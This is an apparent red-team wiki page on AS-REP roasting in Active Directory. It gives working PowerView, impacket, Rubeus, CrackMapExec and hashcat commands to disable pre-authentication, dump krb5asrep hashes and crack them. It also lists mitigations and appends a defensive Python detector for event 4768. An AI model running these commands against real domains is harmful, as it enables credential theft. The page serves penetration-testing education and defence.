Bufu-Sec Wiki

AS-REP Roasting

Overview

  • Dump krb5asrep hashes (the encrypted part of an AS-REP) for user accounts that have Kerberos pre-authentication disabled

  • Users do not have to be service accounts

  • Must have pre-authentication disabled

  • Anyone can request an AS-REP (containing data encrypted with the user's password-derived key) for such a user, because the KDC skips the pre-authentication check

  • Crack dumped hash with hashcat

Exploitation

Force Disable Kerberos Preauth

# Using PowerView 3.0/dev
# Enumerate ACL entries granted to RDPUsers (looking for write access over user objects)
Invoke-ACLScanner -ResolveGUIDs | ?{ $_.IdentityReferenceName -match "RDPUsers" }

# Disable preauth for user by flipping the DONT_REQ_PREAUTH bit (0x400000 = 4194304) of userAccountControl
Set-DomainObject -Identity Control572User -XOR @{useraccountcontrol=4194304} -Verbose

Enumerate Users with Preauth Disabled

# Using PowerView 3.0/dev
Get-DomainUser -PreauthNotRequired -Verbose | Select samaccountname

# Using AD Module
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuth

# Query AS-REP-roastable users with impacket from Kali host
# Supply userlist and don't require authentication
GetNPUsers.py -dc-ip 10.10.149.145 -no-pass -usersfile users.txt -format hashcat -outputfile hashes.asrep spookysec.local/

# Dump krb5asrep hash for a specific user and write it in hashcat format to a file
.\Rubeus.exe asreproast /user:control572user /format:hashcat /outfile:control572user.asrep

# Dump hashes with credentials using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt

# Transfer the hash to the attacker machine; if the encryption type is missing, insert 23$ after $krb5asrep$ so that the line starts with $krb5asrep$23$User.....
# Crack the hash with hashcat (mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat -a 0 -m 18200 hash.txt rockyou.txt

Mitigation

  • Strong password policy

  • Enable Kerberos Pre-Authentication
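The following is an added example, not part of the wiki page, showing the defender-side checks for the two signals this page relies on: a userAccountControl value with the DONT_REQ_PREAUTH bit (4194304 = 0x400000) set, and Security event 4768 entries with Pre-Authentication Type 0, which is what the KDC logs when it issues an AS-REP without pre-authentication. The key=value event lines are constructed to mimic those 4768 fields; the field names and sample users are assumptions.

```python
import re

# DONT_REQ_PREAUTH bit of userAccountControl: 0x400000 == 4194304, the value
# that the Set-DomainObject -XOR command above toggles.
DONT_REQ_PREAUTH = 0x400000
RC4_HMAC = 0x17  # etype 23, the encryption type roasting tools ask for

# Constructed sample 4768 (Kerberos TGT requested) events in key=value form,
# not real logs; the field names follow the 4768 event's XML data names.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.2.50",
    "EventID=4768 TargetUserName=control572user PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.2.99",
    "EventID=4768 TargetUserName=bob PreAuthType=0 TicketEncryptionType=0x12 IpAddress=10.0.2.50",
    "EventID=4768 TargetUserName=legacyapp PreAuthType=2 TicketEncryptionType=0x17 IpAddress=10.0.2.50",
]

def parse_event(line):
    """Split a key=value event line into a dict (values stay as strings)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def preauth_disabled(uac):
    """True when an LDAP userAccountControl value (e.g. from Get-ADUser) has DONT_REQ_PREAUTH set."""
    return bool(int(uac) & DONT_REQ_PREAUTH)

def classify_tgt_request(event):
    """Return 'high', 'medium' or None for one parsed 4768 event.

    PreAuthType 0 means the KDC handed out the AS-REP without pre-authentication,
    which is exactly what AS-REP roasting depends on. RC4 (0x17) raises the
    severity because that etype yields the fast-to-crack hashcat 18200 format.
    """
    if event.get("EventID") != "4768" or event.get("PreAuthType") != "0":
        return None
    etype = int(event.get("TicketEncryptionType", "0"), 16)
    return "high" if etype == RC4_HMAC else "medium"

def find_roast_candidates(lines):
    """Return (severity, target user, source ip) for every suspicious TGT request."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify_tgt_request(ev)
        if sev:
            hits.append((sev, ev["TargetUserName"], ev["IpAddress"]))
    return hits

if __name__ == "__main__":
    for hit in find_roast_candidates(SAMPLE_4768):
        print(hit)
    # Audit check on a userAccountControl value: NORMAL_ACCOUNT plus DONT_REQ_PREAUTH
    print(preauth_disabled(0x200 | DONT_REQ_PREAUTH))
```

Feed the same classifier the real 4768 events from the domain controllers and pair any hit with the account audit, since a legitimate account with pre-auth disabled is the precondition every tool on this page needs.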

Further Reading

iRedTeam: AS-REP Roasting
XPN: Kerberos AD Attacks - More Roasting with AS-REP
harmj0y: Roasting AS-REPs